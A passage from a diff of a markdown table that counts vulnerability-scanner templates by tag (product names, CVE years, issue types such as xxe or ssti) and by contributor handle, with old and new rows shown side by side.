ganofins | 5 | | | | | | | +| devops | 15 | iamnoooob | 5 | | | | | | | +| cve2009 | 14 | tess | 4 | | | | | | | +| login | 14 | e_schultze_ | 4 | | | | | | | +| deserialization | 14 | wisnupramoedya | 4 | | | | | | | +| struts | 14 | nodauf | 4 | | | | | | | +| android | 13 | incogbyte | 4 | | | | | | | +| zoho | 13 | unstabl3 | 3 | | | | | | | +| dns | 13 | _generic_human_ | 3 | | | | | | | +| adobe | 13 | mavericknerd | 3 | | | | | | | | dlink | 13 | johnjhacking | 3 | | | | | | | -| android | 13 | 0w4ys | 3 | | | | | | | -| jenkins | 12 | shifacyclewala | 3 | | | | | | | -| manageengine | 12 | me9187 | 3 | | | | | | | -| magento | 11 | thomas_from_offensity | 3 | | | | | | | -| cve2013 | 11 | jarijaas | 3 | | | | | | | -| xxe | 11 | binaryfigments | 3 | | | | | | | -| dell | 10 | fyoorer | 3 | | | | | | | -| intrusive | 10 | sushantkamble | 3 | | | | | | | -| hp | 10 | mavericknerd | 3 | | | | | | | -| gitlab | 9 | z3bd | 3 | | | | | | | -| ftp | 9 | idealphase | 3 | | | | | | | -| vmware | 9 | sullo | 3 | | | | | | | -| ibm | 9 | impramodsargar | 3 | | | | | | | -| kubernetes | 9 | emenalf | 3 | | | | | | | -| rails | 8 | _generic_human_ | 3 | | | | | | | -| microsoft | 8 | vsh00t | 3 | | | | | | | -| scada | 8 | unstabl3 | 3 | | | | | | | -| cve2008 | 8 | skeltavik | 3 | | | | | | | -| airflow | 8 | yash anand @yashanand155 | 3 | | | | | | | -| fastjson | 8 | shine | 3 | | | | | | | -| backup | 8 | dudez | 3 | | | | | | | -| ruijie | 8 | bp0lr | 2 | | | | | | | -| cnvd | 8 | hetroublemakr | 2 | | | | | | | -| nginx | 8 | gevakun | 2 | | | | | | | -| confluence | 7 | nkxxkn | 2 | | | | | | | -| files | 7 | ehsahil | 2 | | | | | | | -| netgear | 7 | afaq | 2 | | | | | | | -| coldfusion | 7 | udit_thakkur | 2 | | | | | | | -| camera | 7 | randomrobbie | 2 | | | | | | | -| cms | 7 | parth | 2 | | | | | | | -| phpmyadmin | 6 | dheerajmadhukar | 2 | | | | | | | -| api | 6 | bsysop | 2 | | | | | | | -| laravel | 6 | 0xcrypto | 2 | | | | | | | -| drupal | 6 | 0xelkomy | 2 | | | | | | | -| citrix | 6 | dahse89 | 2 | | | | | | | -| rconfig | 6 | gal nagli | 2 | | | | | | | -| prometheus | 6 | joeldeleep | 2 | | | | | | | -| lucee | 6 | amsda | 2 | | | | | | | -| docker | 6 | random-robbie | 2 | | | | | | | -| django | 6 | x1m_martijn | 2 | | | | | | | -| jetty | 6 | cocxanh | 2 | | | | | | | -| fileupload | 6 | lotusdll | 2 | | | | | | | -| nodejs | 6 | fabaff | 2 | | | | | | | -| solr | 6 | alifathi-h1 | 2 | | | | | | | -| circarlife | 5 | martincodes-de | 2 | | | | | | | -| symfony | 5 | bing0o | 2 | | | | | | | -| printer | 5 | 0xrudra | 2 | | | | | | | -| iis | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| headless | 5 | zomsop82 | 2 | | | | | | | -| java | 5 | 0xsmiley | 2 | | | | | | | -| thinkphp | 5 | foulenzer | 2 | | | | | | | -| dedecms | 5 | socketz | 2 | | | | | | | -| crlf | 5 | swissky | 2 | | | | | | | -| jolokia | 5 | pxmme1337 | 2 | | | | | | | -| tomcat | 5 | koti2 | 2 | | | | | | | -| windows | 5 | hahwul | 2 | | | | | | | -| wso2 | 5 | w4cky_ | 2 | | | | | | | -| ssti | 5 | arcc | 2 | | | | | | | -| symantec | 4 | g4l1t0 | 2 | | | | | | | -| resin | 4 | sy3omda | 2 | | | | | | | -| grafana | 4 | convisoappsec | 2 | | | | | | | -| amazon | 4 | mohammedsaneem | 2 | | | | | | | -| keycloak | 4 | moritz nentwig | 2 | | | | | | | -| npm | 4 | r12w4n | 2 | | | | | | | -| moodle | 4 | vavkamil | 2 | | | | | | | -| zimbra | 4 | manas_harsh | 2 | | | | | | | -| glpi | 4 | r3naissance | 2 | | | | | | | -| slack | 4 | kiblyn11 | 2 | | | | | | | -| webserver | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| asp | 4 | ree4pwn | 2 | | | | | | | -| solarwinds | 4 | davidmckennirey | 2 | | | | | | | -| vpn | 4 | lark-lab | 2 | | | | | | | -| exchange | 4 | huowuzhao | 2 | | | | | | | -| firmware | 4 | whoever | 2 | | | | | | | -| maps | 4 | 0xsapra | 2 | | | | | | | -| microstrategy | 4 | bernardofsr | 2 | | | | | | | -| buffalo | 4 | 0xprial | 2 | | | | | | | -| elastic | 4 | infosecsanyam | 1 | | | | | | | -| hongdian | 4 | ldionmarcil | 1 | | | | | | | -| traversal | 4 | lark lab | 1 | | | | | | | -| rfi | 4 | noamrathaus | 1 | | | | | | | -| samsung | 4 | fmunozs | 1 | | | | | | | -| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| proxy | 4 | bolli95 | 1 | | | | | | | -| strapi | 4 | thezakman | 1 | | | | | | | -| magmi | 4 | sbani | 1 | | | | | | | -| zabbix | 4 | philippdelteil | 1 | | | | | | | -| git | 4 | ilovebinbash | 1 | | | | | | | -| firebase | 4 | soyelmago | 1 | | | | | | | -| thinkcmf | 4 | bjhulst | 1 | | | | | | | -| fatpipe | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| minio | 3 | bad5ect0r | 1 | | | | | | | -| zhiyuan | 3 | kurohost | 1 | | | | | | | -| r-seenet | 3 | udyz | 1 | | | | | | | -| vbulletin | 3 | raesene | 1 | | | | | | | -| ebs | 3 | daviey | 1 | | | | | | | -| targa | 3 | akshansh | 1 | | | | | | | -| caucho | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| log | 3 | borna nematzadeh | 1 | | | | | | | -| search | 3 | orpheus | 1 | | | | | | | -| bigip | 3 | mah3sec_ | 1 | | | | | | | -| nosqli | 3 | aceseven (digisec360) | 1 | | | | | | | -| openam | 3 | hanlaomo | 1 | | | | | | | -| tikiwiki | 3 | qlkwej | 1 | | | | | | | -| terramaster | 3 | wabafet | 1 | | | | | | | -| ssh | 3 | xstp | 1 | | | | | | | -| injection | 3 | 0xd0ff9 | 1 | | | | | | | -| openssh | 3 | th3.d1p4k | 1 | | | | | | | -| nacos | 3 | kaizensecurity | 1 | | | | | | | -| oa | 3 | manuelbua | 1 | | | | | | | -| nexus | 3 | b0yd | 1 | | | | | | | -| bitrix | 3 | patralos | 1 | | | | | | | -| jeesns | 3 | apt-mirror | 1 | | | | | | | -| azure | 3 | alex | 1 | | | | | | | -| github | 3 | kabirsuda | 1 | | | | | | | -| cve2007 | 3 | exploitation | 1 | | | | | | | -| fanruan | 3 | retr0 | 1 | | | | | | | -| cloud | 3 | intx0x80 | 1 | | | | | | | -| cacti | 3 | jrolf | 1 | | | | | | | -| ofbiz | 3 | ooooooo_q | 1 | | | | | | | -| hoteldruid | 3 | willd96 | 1 | | | | | | | -| lansweeper | 3 | nerrorsec | 1 | | | | | | | -| springcloud | 3 | tirtha_mandal | 1 | | | | | | | +| jenkins | 12 | yash anand @yashanand155 | 3 | | | | | | | +| manageengine | 12 | f1tz | 3 | | | | | | | +| cve2013 | 11 | sullo | 3 | | | | | | | +| intrusive | 11 | z3bd | 3 | | | | | | | +| xxe | 11 | andydoering | 3 | | | | | | | +| magento | 11 | forgedhallpass | 3 | | | | | | | +| hp | 10 | vsh00t | 3 | | | | | | | +| dell | 10 | alifathi-h1 | 3 | | | | | | | +| rails | 9 | skeltavik | 3 | | | | | | | +| kubernetes | 9 | shine | 3 | | | | | | | +| ibm | 9 | 0w4ys | 3 | | | | | | | +| gitlab | 9 | impramodsargar | 3 | | | | | | | +| vmware | 9 | idealphase | 3 | | | | | | | +| ftp | 9 | thomas_from_offensity | 3 | | | | | | | +| nginx | 8 | shifacyclewala | 3 | | | | | | | +| backup | 8 | fyoorer | 3 | | | | | | | +| airflow | 8 | me9187 | 3 | | | | | | | +| microsoft | 8 | emenalf | 3 | | | | | | | +| cnvd | 8 | sushantkamble | 3 | | | | | | | +| cve2008 | 8 | dudez | 3 | | | | | | | +| scada | 8 | jarijaas | 3 | | | | | | | +| fastjson | 8 | binaryfigments | 3 | | | | | | | +| ruijie | 8 | github.com/its0x08 | 3 | | | | | | | +| cms | 7 | convisoappsec | 2 | | | | | | | +| confluence | 7 | lotusdll | 2 | | | | | | | +| files | 7 | moritz nentwig | 2 | | | | | | | +| camera | 7 | kiblyn11 | 2 | | | | | | | +| netgear | 7 | lark-lab | 2 | | | | | | | +| coldfusion | 7 | bernardofsr | 2 | | | | | | | +| django | 7 | hetroublemakr | 2 | | | | | | | +| laravel | 6 | hahwul | 2 | | | | | | | +| drupal | 6 | davidmckennirey | 2 | | | | | | | +| docker | 6 | mohammedsaneem | 2 | | | | | | | +| lucee | 6 | arcc | 2 | | | | | | | +| prometheus | 6 | 0xprial | 2 | | | | | | | +| phpmyadmin | 6 | gevakun | 2 | | | | | | | +| api | 6 | nkxxkn | 2 | | | | | | | +| jetty | 6 | vavkamil | 2 | | | | | | | +| solr | 6 | bing0o | 2 | | | | | | | +| fileupload | 6 | udit_thakkur | 2 | | | | | | | +| nodejs | 6 | pxmme1337 | 2 | | | | | | | +| rconfig | 6 | afaq | 2 | | | | | | | +| citrix | 6 | r12w4n | 2 | | | | | | | +| sitecore | 6 | fabaff | 2 | | | | | | | +| thinkphp | 5 | dahse89 | 2 | | | | | | | +| circarlife | 5 | socketz | 2 | | | | | | | +| printer | 5 | w4cky_ | 2 | | | | | | | +| crlf | 5 | manas_harsh | 2 | | | | | | | +| ssti | 5 | huowuzhao | 2 | | | | | | | +| dedecms | 5 | alph4byt3 | 2 | | | | | | | +| headless | 5 | koti2 | 2 | | | | | | | +| tomcat | 5 | x1m_martijn | 2 | | | | | | | +| iis | 5 | 0xsapra | 2 | | | | | | | +| jolokia | 5 | cocxanh | 2 | | | | | | | +| windows | 5 | 0xsmiley | 2 | | | | | | | +| symfony | 5 | g4l1t0 | 2 | | | | | | | +| wso2 | 5 | bsysop | 2 | | | | | | | +| java | 5 | dheerajmadhukar | 2 | | | | | | | +| git | 4 | swissky | 2 | | | | | | | +| grafana | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| rfi | 4 | gal nagli | 2 | | | | | | | +| slack | 4 | parth | 2 | | | | | | | +| buffalo | 4 | its0x08 | 2 | | | | | | | +| artifactory | 4 | sy3omda | 2 | | | | | | | +| magmi | 4 | zomsop82 | 2 | | | | | | | +| zimbra | 4 | bp0lr | 2 | | | | | | | +| strapi | 4 | martincodes-de | 2 | | | | | | | +| zabbix | 4 | randomrobbie | 2 | | | | | | | +| traversal | 4 | r3naissance | 2 | | | | | | | +| moodle | 4 | ehsahil | 2 | | | | | | | +| fatpipe | 4 | whoever | 2 | | | | | | | +| resin | 4 | amsda | 2 | | | | | | | +| thinkcmf | 4 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| microstrategy | 4 | foulenzer | 2 | | | | | | | +| exchange | 4 | 0xelkomy | 2 | | | | | | | +| proxy | 4 | joeldeleep | 2 | | | | | | | +| elastic | 4 | random-robbie | 2 | | | | | | | +| enum | 4 | ree4pwn | 2 | | | | | | | +| maps | 4 | 0xcrypto | 2 | | | | | | | +| keycloak | 4 | 0xrudra | 2 | | | | | | | +| symantec | 4 | ratnadip gajbhiye | 1 | | | | | | | +| samsung | 4 | 0xrod | 1 | | | | | | | +| glpi | 4 | harshinsecurity | 1 | | | | | | | +| firmware | 4 | droberson | 1 | | | | | | | +| amazon | 4 | vzamanillo | 1 | | | | | | | +| bigip | 4 | mass0ma | 1 | | | | | | | +| asp | 4 | ipanda | 1 | | | | | | | +| vpn | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| hongdian | 4 | brabbit10 | 1 | | | | | | | +| solarwinds | 4 | naglinagli | 1 | | | | | | | +| npm | 4 | borna nematzadeh | 1 | | | | | | | +| firebase | 4 | yavolo | 1 | | | | | | | +| webserver | 4 | nerrorsec | 1 | | | | | | | +| sonicwall | 3 | juicypotato1 | 1 | | | | | | | +| itop | 3 | zhenwarx | 1 | | | | | | | +| nosqli | 3 | petruknisme | 1 | | | | | | | +| backdoor | 3 | hanlaomo | 1 | | | | | | | +| cloud | 3 | cookiehanhoan | 1 | | | | | | | +| search | 3 | akshansh | 1 | | | | | | | +| tikiwiki | 3 | bjhulst | 1 | | | | | | | +| cacti | 3 | rojanrijal | 1 | | | | | | | +| jeesns | 3 | rodnt | 1 | | | | | | | +| druid | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| kafka | 3 | thebinitghimire | 1 | | | | | | | +| openssh | 3 | infosecsanyam | 1 | | | | | | | +| oa | 3 | xstp | 1 | | | | | | | +| mongodb | 3 | chron0x | 1 | | | | | | | +| minio | 3 | fopina | 1 | | | | | | | +| cve2007 | 3 | _0xf4n9x_ | 1 | | | | | | | +| sql | 3 | thezakman | 1 | | | | | | | +| terramaster | 3 | adrianmf | 1 | | | | | | | +| hoteldruid | 3 | x6263 | 1 | | | | | | | +| opensis | 3 | s1r1u5_ | 1 | | | | | | | | httpd | 3 | affix | 1 | | | | | | | -| sonicwall | 3 | thevillagehacker | 1 | | | | | | | -| fpd | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| cves | 3 | fopina | 1 | | | | | | | -| jellyfin | 3 | deena | 1 | | | | | | | -| lfr | 3 | ajaysenr | 1 | | | | | | | -| node | 3 | forgedhallpass | 1 | | | | | | | -| druid | 3 | zhenwarx | 1 | | | | | | | -| mongodb | 3 | kareemse1im | 1 | | | | | | | -| exposures | 3 | tim_koopmans | 1 | | | | | | | -| backdoor | 3 | _harleo | 1 | | | | | | | -| mail | 3 | streetofhackerr007 | 1 | | | | | | | -| telerik | 3 | sshell | 1 | | | | | | | -| linkerd | 3 | elouhi | 1 | | | | | | | -| itop | 3 | brabbit10 | 1 | | | | | | | -| opensis | 3 | 0h1in9e | 1 | | | | | | | -| kafka | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| smtp | 3 | ahmed sherif | 1 | | | | | | | -| kevinlab | 3 | aresx | 1 | | | | | | | -| kibana | 3 | luskabol | 1 | | | | | | | -| trixbox | 2 | omarkurt | 1 | | | | | | | -| akkadian | 2 | ahmetpergamum | 1 | | | | | | | -| aspose | 2 | zandros0 | 1 | | | | | | | -| globalprotect | 2 | yashgoti | 1 | | | | | | | -| lotus | 2 | undefl0w | 1 | | | | | | | -| couchdb | 2 | clarkvoss | 1 | | | | | | | -| leak | 2 | sickwell | 1 | | | | | | | -| tidb | 2 | andysvints | 1 | | | | | | | -| activemq | 2 | schniggie | 1 | | | | | | | -| oauth | 2 | harshinsecurity | 1 | | | | | | | -| prtg | 2 | berkdusunur | 1 | | | | | | | -| wuzhicms | 2 | vzamanillo | 1 | | | | | | | -| openfire | 2 | taielab | 1 | | | | | | | -| axis | 2 | andirrahmani1 | 1 | | | | | | | -| yii | 2 | jeya seelan | 1 | | | | | | | -| ecology | 2 | micha3lb3n | 1 | | | | | | | -| harbor | 2 | yashanand155 | 1 | | | | | | | -| maian | 2 | co0nan | 1 | | | | | | | -| phpcollab | 2 | @ofjaaah | 1 | | | | | | | -| igs | 2 | s1r1u5_ | 1 | | | | | | | -| linkedin | 2 | hakluke | 1 | | | | | | | -| nextcloud | 2 | ratnadip gajbhiye | 1 | | | | | | | -| hpe | 2 | b4uh0lz | 1 | | | | | | | -| mailchimp | 2 | remonsec | 1 | | | | | | | -| backups | 2 | izn0u | 1 | | | | | | | -| splunk | 2 | @github.com/defr0ggy | 1 | | | | | | | -| totemomail | 2 | bernardo rodrigues | 1 | | | | | | | +| node | 3 | whynotke | 1 | | | | | | | +| github | 3 | mesaglio | 1 | | | | | | | +| nexus | 3 | rotemreiss | 1 | | | | | | | +| azure | 3 | elmahdi | 1 | | | | | | | +| fpd | 3 | omarkurt | 1 | | | | | | | +| exposures | 3 | florianmaak | 1 | | | | | | | +| linkerd | 3 | daviey | 1 | | | | | | | +| caucho | 3 | toufik airane | 1 | | | | | | | +| zhiyuan | 3 | ahmed sherif | 1 | | | | | | | +| openam | 3 | andirrahmani1 | 1 | | | | | | | +| fanruan | 3 | philippdelteil | 1 | | | | | | | +| ssh | 3 | lethargynavigator | 1 | | | | | | | +| ebs | 3 | push4d | 1 | | | | | | | +| kibana | 3 | tim_koopmans | 1 | | | | | | | +| lansweeper | 3 | mah3sec_ | 1 | | | | | | | +| lfr | 3 | schniggie | 1 | | | | | | | +| injection | 3 | mubassirpatel | 1 | | | | | | | +| mail | 3 | b0rn2r00t | 1 | | | | | | | +| movable | 3 | blckraven | 1 | | | | | | | +| ofbiz | 3 | pratik khalane | 1 | | | | | | | +| smtp | 3 | @dwisiswant0 | 1 | | | | | | | +| r-seenet | 3 | akash.c | 1 | | | | | | | +| springcloud | 3 | bolli95 | 1 | | | | | | | +| telerik | 3 | nytr0gen | 1 | | | | | | | +| vbulletin | 3 | b4uh0lz | 1 | | | | | | | +| nacos | 3 | th3.d1p4k | 1 | | | | | | | +| cves | 3 | evolutionsec | 1 | | | | | | | +| targa | 3 | ilovebinbash | 1 | | | | | | | +| kevinlab | 3 | streetofhackerr007 | 1 | | | | | | | +| log | 3 | ringo | 1 | | | | | | | +| jellyfin | 3 | _c0wb0y_ | 1 | | | | | | | +| bitrix | 3 | becivells | 1 | | | | | | | +| natshell | 2 | kre80r | 1 | | | | | | | +| dolibarr | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| waf | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| qcubed | 2 | sickwell | 1 | | | | | | | +| horde | 2 | qlkwej | 1 | | | | | | | +| yii | 2 | shreyapohekar | 1 | | | | | | | +| getsimple | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| openemr | 2 | orpheus | 1 | | | | | | | +| sonarqube | 2 | sec_hawk | 1 | | | | | | | +| kong | 2 | luci | 1 | | | | | | | +| geowebserver | 2 | manuelbua | 1 | | | | | | | +| adminer | 2 | un-fmunozs | 1 | | | | | | | +| maian | 2 | smaranchand | 1 | | | | | | | +| dos | 2 | kabirsuda | 1 | | | | | | | +| cve2005 | 2 | 0h1in9e | 1 | | | | | | | +| jeedom | 2 | husain | 1 | | | | | | | +| oauth | 2 | zandros0 | 1 | | | | | | | +| globalprotect | 2 | charanrayudu | 1 | | | | | | | +| idea | 2 | sicksec | 1 | | | | | | | +| bucket | 2 | mhdsamx | 1 | | | | | | | +| huawei | 2 | makyotox | 1 | | | | | | | +| backups | 2 | udyz | 1 | | | | | | | +| trixbox | 2 | andysvints | 1 | | | | | | | +| hashicorp | 2 | jeya seelan | 1 | | | | | | | +| glassfish | 2 | exploitation | 1 | | | | | | | +| flir | 2 | alex | 1 | | | | | | | +| ucmdb | 2 | flag007 | 1 | | | | | | | +| sharepoint | 2 | retr02332 | 1 | | | | | | | +| text | 2 | remonsec | 1 | | | | | | | +| netis | 2 | berkdusunur | 1 | | | | | | | +| totemomail | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| rocketchat | 2 | co0nan | 1 | | | | | | | +| commax | 2 | ooooooo_q | 1 | | | | | | | +| paloalto | 2 | majidmc2 | 1 | | | | | | | +| qihang | 2 | izn0u | 1 | | | | | | | +| storage | 2 | tirtha_mandal | 1 | | | | | | | +| rstudio | 2 | iampritam | 1 | | | | | | | +| rockmongo | 2 | @ofjaaah | 1 | | | | | | | +| idrac | 2 | dawid-czarnecki | 1 | | | | | | | +| status | 2 | soyelmago | 1 | | | | | | | +| linux | 2 | 0xtavian | 1 | | | | | | | +| frp | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| mailchimp | 2 | elder tao | 1 | | | | | | | +| embed | 2 | micha3lb3n | 1 | | | | | | | +| aruba | 2 | sshell | 1 | | | | | | | +| netsweeper | 2 | aresx | 1 | | | | | | | +| s3 | 2 | fmunozs | 1 | | | | | | | +| zeroshell | 2 | pudsec | 1 | | | | | | | +| kentico | 2 | intx0x80 | 1 | | | | | | | +| jsf | 2 | yashanand155 | 1 | | | | | | | +| ecology | 2 | absshax | 1 | | | | | | | +| fortios | 2 | jteles | 1 | | | | | | | +| igs | 2 | alperenkesk | 1 | | | | | | | +| phpcollab | 2 | kaizensecurity | 1 | | | | | | | +| cache | 2 | defr0ggy | 1 | | | | | | | +| odoo | 2 | _harleo | 1 | | | | | | | +| electron | 2 | kba@sogeti_esec | 1 | | | | | | | +| nextjs | 2 | retr0 | 1 | | | | | | | +| service | 2 | 0xteles | 1 | | | | | | | +| bypass | 2 | elouhi | 1 | | | | | | | +| middleware | 2 | notsoevilweasel | 1 | | | | | | | +| harbor | 2 | deena | 1 | | | | | | | +| rancher | 2 | ajaysenr | 1 | | | | | | | +| hikvision | 2 | sbani | 1 | | | | | | | +| smb | 2 | clarkvoss | 1 | | | | | | | +| chamilo | 2 | oscarintherocks | 1 | | | | | | | +| payara | 2 | wabafet | 1 | | | | | | | +| saltstack | 2 | thevillagehacker | 1 | | | | | | | +| axis2 | 2 | kurohost | 1 | | | | | | | +| avantfax | 2 | b0yd | 1 | | | | | | | +| nextcloud | 2 | taielab | 1 | | | | | | | +| plesk | 2 | hakluke | 1 | | | | | | | +| liferay | 2 | patralos | 1 | | | | | | | +| vcenter | 2 | furkansenan | 1 | | | | | | | +| wuzhicms | 2 | geraldino2 | 1 | | | | | | | +| guacamole | 2 | yashgoti | 1 | | | | | | | +| spring | 2 | @github.com/defr0ggy | 1 | | | | | | | +| ruby | 2 | 0xh7ml | 1 | | | | | | | +| db | 2 | _darrenmartyn | 1 | | | | | | | +| fortinet | 2 | bad5ect0r | 1 | | | | | | | +| aviatrix | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| db | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| frp | 2 | j33n1k4 | 1 | | | | | | | -| geowebserver | 2 | nvn1729 | 1 | | | | | | | -| payara | 2 | c3l3si4n | 1 | | | | | | | -| waf | 2 | kre80r | 1 | | | | | | | -| prestashop | 2 | alph4byt3 | 1 | | | | | | | -| yapi | 2 | luci | 1 | | | | | | | -| favicon | 2 | knassar702 | 1 | | | | | | | -| qcubed | 2 | retr02332 | 1 | | | | | | | -| jeedom | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| idrac | 2 | kba@sogeti_esec | 1 | | | | | | | -| vcenter | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openemr | 2 | sec_hawk | 1 | | | | | | | -| jsf | 2 | _darrenmartyn | 1 | | | | | | | -| rancher | 2 | majidmc2 | 1 | | | | | | | -| spark | 2 | _0xf4n9x_ | 1 | | | | | | | -| netsweeper | 2 | makyotox | 1 | | | | | | | -| cache | 2 | 52971 | 1 | | | | | | | -| justwriting | 2 | geraldino2 | 1 | | | | | | | -| rstudio | 2 | smaranchand | 1 | | | | | | | -| icewarp | 2 | whynotke | 1 | | | | | | | -| cve2005 | 2 | _c0wb0y_ | 1 | | | | | | | -| chiyu | 2 | absshax | 1 | | | | | | | -| odoo | 2 | chron0x | 1 | | | | | | | -| adminer | 2 | mhdsamx | 1 | | | | | | | -| emerge | 2 | shelld3v | 1 | | | | | | | -| pega | 2 | 0ut0fb4nd | 1 | | | | | | | -| natshell | 2 | cookiehanhoan | 1 | | | | | | | -| heroku | 2 | rotemreiss | 1 | | | | | | | -| rocketchat | 2 | its0x08 | 1 | | | | | | | -| nextjs | 2 | iampritam | 1 | | | | | | | -| service | 2 | regala_ | 1 | | | | | | | -| phpstorm | 2 | akash.c | 1 | | | | | | | -| xxljob | 2 | d0rkerdevil | 1 | | | | | | | -| paloalto | 2 | ipanda | 1 | | | | | | | -| mcafee | 2 | adrianmf | 1 | | | | | | | -| idea | 2 | 0xrod | 1 | | | | | | | -| status | 2 | 0xtavian | 1 | | | | | | | -| hasura | 2 | juicypotato1 | 1 | | | | | | | -| ecoa | 2 | droberson | 1 | | | | | | | -| webcam | 2 | rodnt | 1 | | | | | | | -| horde | 2 | ringo | 1 | | | | | | | -| aruba | 2 | pratik khalane | 1 | | | | | | | -| jetbrains | 2 | @dwisiswant0 | 1 | | | | | | | -| guacamole | 2 | toufik airane | 1 | | | | | | | -| hashicorp | 2 | mubassirpatel | 1 | | | | | | | -| liferay | 2 | x6263 | 1 | | | | | | | -| flir | 2 | dawid-czarnecki | 1 | | | | | | | -| linux | 2 | evolutionsec | 1 | | | | | | | -| avantfax | 2 | rojanrijal | 1 | | | | | | | -| redis | 2 | 0xteles | 1 | | | | | | | -| fortios | 2 | shifacyclewla | 1 | | | | | | | -| showdoc | 2 | push4d | 1 | | | | | | | -| hjtcloud | 2 | b0rn2r00t | 1 | | | | | | | -| openvpn | 2 | lethargynavigator | 1 | | | | | | | -| embed | 2 | alperenkesk | 1 | | | | | | | -| chamilo | 2 | furkansenan | 1 | | | | | | | -| sitecore | 2 | petruknisme | 1 | | | | | | | -| commax | 2 | shreyapohekar | 1 | | | | | | | -| ilo | 2 | defr0ggy | 1 | | | | | | | -| akamai | 2 | mesaglio | 1 | | | | | | | -| middleware | 2 | naglinagli | 1 | | | | | | | -| vrealize | 2 | yavolo | 1 | | | | | | | -| voipmonitor | 2 | pdp | 1 | | | | | | | -| getsimple | 2 | un-fmunozs | 1 | | | | | | | -| zeroshell | 2 | flag007 | 1 | | | | | | | -| bitly | 2 | jteles | 1 | | | | | | | -| enumeration | 2 | blckraven | 1 | | | | | | | -| aviatrix | 2 | elmahdi | 1 | | | | | | | -| glassfish | 2 | gboddin | 1 | | | | | | | -| ec2 | 2 | oscarintherocks | 1 | | | | | | | -| places | 2 | florianmaak | 1 | | | | | | | -| fortinet | 2 | pudsec | 1 | | | | | | | -| kong | 2 | becivells | 1 | | | | | | | -| qihang | 2 | igibanez | 1 | | | | | | | -| hostheader-injection | 2 | nytr0gen | 1 | | | | | | | -| huawei | 2 | sicksec | 1 | | | | | | | -| netis | 2 | thebinitghimire | 1 | | | | | | | -| mida | 2 | ohlinge | 1 | | | | | | | -| shellshock | 2 | mass0ma | 1 | | | | | | | -| plesk | 2 | elder tao | 1 | | | | | | | -| bucket | 2 | notsoevilweasel | 1 | | | | | | | -| rockmongo | 2 | revblock | 1 | | | | | | | -| ucmdb | 2 | | | | | | | | | -| upload | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | +| jboss | 2 | 0xd0ff9 | 1 | | | | | | | +| leak | 2 | aceseven (digisec360) | 1 | | | | | | | +| chyrp | 2 | ahmetpergamum | 1 | | | | | | | +| akkadian | 2 | kareemse1im | 1 | | | | | | | +| prestashop | 2 | willd96 | 1 | | | | | | | +| spark | 2 | gboddin | 1 | | | | | | | +| hpe | 2 | ohlinge | 1 | | | | | | | +| bruteforce | 2 | c3l3si4n | 1 | | | | | | | +| akamai | 2 | igibanez | 1 | | | | | | | +| hjtcloud | 2 | 52971 | 1 | | | | | | | +| showdoc | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| aspose | 2 | ldionmarcil | 1 | | | | | | | +| wordfence | 2 | 0ut0fb4nd | 1 | | | | | | | +| seeyon | 2 | d0rkerdevil | 1 | | | | | | | +| axis | 2 | undefl0w | 1 | | | | | | | +| pega | 2 | noamrathaus | 1 | | | | | | | +| grav | 2 | regala_ | 1 | | | | | | | +| mida | 2 | pdp | 1 | | | | | | | +| favicon | 2 | apt-mirror | 1 | | | | | | | +| lotus | 2 | luskabol | 1 | | | | | | | +| myfactory | 2 | j33n1k4 | 1 | | | | | | | +| forcepoint | 2 | raesene | 1 | | | | | | | +| ecoa | 2 | revblock | 1 | | | | | | | +| jetbrains | 2 | jrolf | 1 | | | | | | | +| linkedin | 2 | jiheon-dev | 1 | | | | | | | +| openvpn | 2 | shifacyclewla | 1 | | | | | | | +| couchdb | 2 | lark lab | 1 | | | | | | | +| emerge | 2 | knassar702 | 1 | | | | | | | +| icewarp | 2 | nvn1729 | 1 | | | | | | | +| hasura | 2 | shelld3v | 1 | | | | | | | +| xxljob | 2 | | | | | | | | | | nagios | 2 | | | | | | | | | -| saltstack | 2 | | | | | | | | | -| sonarqube | 2 | | | | | | | | | -| axis2 | 2 | | | | | | | | | -| electron | 2 | | | | | | | | | -| seeyon | 2 | | | | | | | | | -| grav | 2 | | | | | | | | | -| kentico | 2 | | | | | | | | | -| storage | 2 | | | | | | | | | -| dolibarr | 2 | | | | | | | | | -| dos | 2 | | | | | | | | | -| s3 | 2 | | | | | | | | | -| sharepoint | 2 | | | | | | | | | -| smb | 2 | | | | | | | | | -| bypass | 2 | | | | | | | | | -| chyrp | 2 | | | | | | | | | -| wordfence | 2 | | | | | | | | | -| jboss | 2 | | | | | | | | | -| text | 2 | | | | | | | | | -| doh | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| dwsync | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| sast | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | 